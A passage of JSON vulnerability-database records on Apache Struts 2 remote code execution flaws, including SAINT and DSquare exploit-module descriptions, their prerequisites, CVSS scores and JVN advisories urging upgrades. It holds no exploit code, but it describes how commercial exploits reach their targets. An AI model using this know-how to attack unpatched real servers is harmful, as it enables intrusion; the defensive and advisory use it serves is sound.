"AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-29T16:40:17", "description": "Added: 08/05/2010 \nCVE: [CVE-2010-1870](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870>) \nBID: [41592](<http://www.securityfocus.com/bid/41592>) \nOSVDB: [66280](<http://www.osvdb.org/66280>) \n\n\n### Background\n\n[Apache Struts](<http://projects.apache.org/projects/struts.html>) is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the appropriate Java method to handle each input parameter. \n\n### Problem\n\nA security bypass vulnerability exists in the ParameterInterceptor. A remote attacker could execute arbitrary commands by setting various OGNL context variables using unicode strings in parameter names. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/downloads.html>) to Apache Struts 2.2 or higher when available. \n\n### References\n\n<http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html> \n\n\n### Limitations\n\nExploit works on Apache Struts 2.1.8.1. The specified share must be accessible by the target. \n\nBefore the exploit can succeed, exploit.exe must be placed on the specified share. Use the Download Connection or E-mail Attachment Execution exploit tool to obtain exploit.exe, using the same shell port as used with this exploit. Due to this requirement, this exploit must be run individually and is not included during an automated penetration test. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-08-05T00:00:00", "type": "saint", "title": "Apache Struts2 XWork ParameterInterceptor security bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-05T00:00:00", "id": "SAINT:52FE4CC3610DB129C039F9F864818929", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_xwork_parameterinterceptor", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-26T11:35:26", "description": "Added: 08/05/2010 \nCVE: [CVE-2010-1870](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870>) \nBID: [41592](<http://www.securityfocus.com/bid/41592>) \nOSVDB: [66280](<http://www.osvdb.org/66280>) \n\n\n### Background\n\n[Apache Struts](<http://projects.apache.org/projects/struts.html>) is a Java web application framework. Apache Struts version 2 is based on WebWork 2. WebWork 2 uses XWork to invoke actions based on HTTP parameter names. The ParameterInterceptor component of XWork runs the appropriate Java method to handle each input parameter. \n\n### Problem\n\nA security bypass vulnerability exists in the ParameterInterceptor. A remote attacker could execute arbitrary commands by setting various OGNL context variables using unicode strings in parameter names. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/downloads.html>) to Apache Struts 2.2 or higher when available. \n\n### References\n\n<http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html> \n\n\n### Limitations\n\nExploit works on Apache Struts 2.1.8.1. The specified share must be accessible by the target. \n\nBefore the exploit can succeed, exploit.exe must be placed on the specified share. Use the Download Connection or E-mail Attachment Execution exploit tool to obtain exploit.exe, using the same shell port as used with this exploit. Due to this requirement, this exploit must be run individually and is not included during an automated penetration test. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-08-05T00:00:00", "type": "saint", "title": "Apache Struts2 XWork ParameterInterceptor security bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-05T00:00:00", "id": "SAINT:05F171426D41814939EA98ED1A825F67", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/struts_xwork_parameterinterceptor", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-26T11:36:04", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:46C06C664B1E5C691A77B2FC04327D68", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:7B263B551E3799A3C795713D657E1BD2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:41", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:4B122F6299581540A8429BAA06656ACE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:11", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-10-18T00:00:00", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.2 RCE Linux", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2115"], "modified": "2013-10-18T00:00:00", "id": "E-340", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2013-10-20T00:00:00", "type": "dsquare", "title": "Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-10-20T00:00:00", "id": "E-341", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Apache Struts Crafted Parameter Arbitrary OGNL Code Execution\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2013-10-17T00:00:00", "type": "dsquare", "title": "Apache-Struts Showcase < 2.3.14.1 RCE Linux", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965"], "modified": "2013-10-17T00:00:00", "id": "E-339", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-26T00:00:00", "type": "dsquare", "title": "Apache-Struts < 2.2.0 RCE Windows", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2013-09-22T00:00:00", "id": "E-2", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-26T00:00:00", "type": "dsquare", "title": "Apache-Struts < 2.2.0 RCE Linux", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2013-09-22T00:00:00", "id": "E-30", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2013-05-22T00:00:00", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.1 RCE Linux", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966"], "modified": "2013-10-12T00:00:00", "id": "E-319", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-08-04T15:08:50", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-07-20T00:00:00", "type": "attackerkb", "title": "CVE-2013-2251", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2020-07-30T00:00:00", "id": "AKB:F287CDB5-FC29-49E2-B958-BAAE1EECEA70", "href": "https://attackerkb.com/topics/Sftg6M4yzi/cve-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-06T08:35:01", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "attackerkb", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-07-30T00:00:00", "id": "AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "href": "https://attackerkb.com/topics/xU2Ap2yNUC/cve-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2021-07-28T14:32:21", "description": "**Name**| d2sec_struts4 \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts4 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-07-20T03:37:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS4", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T03:37:00", "id": "D2SEC_STRUTS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:32:22", "description": "**Name**| d2sec_struts \n---|--- \n**CVE**| CVE-2010-1870 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2010-08-17T20:00:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-08-17T20:00:00", "id": "D2SEC_STRUTS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_struts2 \n---|--- \n**CVE**| CVE-2012-0391 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2012-01-08T15:55:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T15:55:00", "id": "D2SEC_STRUTS2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2021-12-28T23:21:05", "description": "Apache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a remote command execution vulnerability. \n \nThis issue is the same issue that the developer published as [S2-016](<http://struts.apache.org/release/2.3.x/docs/s2-016.html>) on July 16, 2013 \n \nNote that attacks leveraging this vulnerability have been confirmed. \n\n\n ## Impact\n\nAn arbitrary command may be executed on the server where Apache Struts resides.\n\n ## Solution\n\n**Apply an Update** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * Apache Struts 2.0.0 through 2.3.15 \n\n", "cvss3": {}, "published": "2013-09-06T00:00:00", "type": "jvn", "title": "JVN#33504150: Apache Struts vulnerable to remote command execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-09-06T00:00:00", "id": "JVN:33504150", "href": "http://jvn.jp/en/jp/JVN33504150/index.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:21:13", "description": "Apache Struts 2 is a framework to create Java web applications. Apache Struts 2 contains an arbitrary Java method execution vulnerability due to improper conversion in OGNL expression if a non-string property is contained in action.\n\n ## Impact\n\nIf a remote attacker sends a malformed request parameter to a vulnerable system, an arbitrary Java method may be executed. As a result, information such as environment variables may be disclosed, a denial-of-service (DoS) attack may be conducted, or an arbitrary OS command may be executed.\n\n ## Solution\n\n**Update the Software** \nApply the latest version according to the information provided by the developer. \nThe fix for this issue was contained in Apache Struts 2.2.3.1 released on September 2011. \n \nAccording to the developer, Apache Struts 2.0.x is no longer supported, thus it is strongly recommended that users should upgrade to Apache Struts 2.3.x.\n\n ## Products Affected\n\n * Apache Struts versions prior to 2.2.3\n * Apache Struts versions 2.0.x\n", "cvss3": {}, "published": "2012-02-10T00:00:00", "type": "jvn", "title": "JVN#79099262: Apache Struts 2 vulnerable to an arbitrary Java method execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0838"], "modified": "2012-02-10T00:00:00", "id": "JVN:79099262", "href": "http://jvn.jp/en/jp/JVN79099262/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nCVE-2013-2251: Apache Archiva 